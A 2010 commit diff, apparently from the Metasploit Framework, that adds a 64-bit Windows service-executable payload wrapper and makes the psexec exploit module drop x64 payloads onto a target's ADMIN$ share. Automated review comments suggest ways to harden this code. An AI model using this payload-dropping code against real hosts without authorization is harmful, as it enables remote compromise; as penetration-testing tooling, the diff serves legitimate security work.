allow x64 payloads to be used with psexec

git-svn-id: file:///home/svn/framework3/trunk@9565 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-06-21 03:49:39 +00:00
parent 33086db682
commit 2c91164494
2 changed files with 26 additions and 2 deletions


@ -351,6 +351,26 @@ require 'metasm'
return pe return pe
end end
def self.to_win64pe_service(framework, code, name='SERVICENAME')
pe = ''
fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "..", "data", "templates", "service_x64.exe"), "rb")
pe = fd.read(fd.stat.size)
fd.close
bo = pe.index('PAYLOAD:')
raise RuntimeError, "Invalid Win64 PE Service EXE template!" if not bo
pe[bo, 8192] = [code].pack("a8192")
bo = pe.index('SERVICENAME')
raise RuntimeError, "Invalid Win64 PE Service EXE template!" if not bo
pe[bo, 11] = [name].pack('a11')
pe[136, 4] = [rand(0x100000000)].pack('V')
return pe
end
def self.to_win32pe_dll(framework, code) def self.to_win32pe_dll(framework, code)
pe = '' pe = ''
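Review bot: In `to_win64pe_service`, `[code].pack("a8192")` and `[name].pack('a11')` silently truncate anything longer than the template slot, so an oversized `code` produces a corrupt executable with no error raised. A length guard before the splice makes the failure explicit, for example `raise RuntimeError, "Payload too large for Win64 service template" if code.length > 8192`. The template is also read through a bare `File.open` ... `fd.close` pair, which leaves the handle open if `read` raises; the block form `File.open(path, "rb") { |f| f.read }` closes it on every path. The write to `pe[136, 4]` deserves a one-line comment naming the header field it randomizes, since a bare offset is presumably tied to this template's layout.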


@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
}, },
'Author' => 'Author' =>
[ [
'hdm' 'hdm',
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Version' => '$Revision$', 'Version' => '$Revision$',
@ -127,7 +127,11 @@ class Metasploit3 < Msf::Exploit::Remote
filename = rand_text_alpha(8) + ".exe" filename = rand_text_alpha(8) + ".exe"
simple.connect("ADMIN$") simple.connect("ADMIN$")
fd = simple.open("\\#{filename}", 'rwct') fd = simple.open("\\#{filename}", 'rwct')
fd << Msf::Util::EXE.to_win32pe_service(framework,payload.encoded,rand_text_alpha(8)) if (datastore['PAYLOAD'].include? 'x64')
fd << Msf::Util::EXE.to_win64pe_service(framework,payload.encoded,rand_text_alpha(8))
else
fd << Msf::Util::EXE.to_win32pe_service(framework,payload.encoded,rand_text_alpha(8))
end
fd.close fd.close
print_status("Created \\#{filename}...") print_status("Created \\#{filename}...")
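Review bot: The new branch picks the 64-bit template by substring, `datastore['PAYLOAD'].include? 'x64'`, which couples the choice to payload naming and raises NoMethodError if `datastore['PAYLOAD']` is nil. Keying on the payload's declared architecture would be sturdier, something like `if payload_instance.arch.include?(ARCH_X86_64)` (confirm the accessor against the framework version in use). Both arms pass the same three arguments, so selecting the generator method first and calling it once would remove the duplication. If the generator raises (the Win64 one does on an invalid template), `fd` is left open on the share, so an `ensure fd.close` around the write is worth adding. The enclosing method starts and ends outside this hunk.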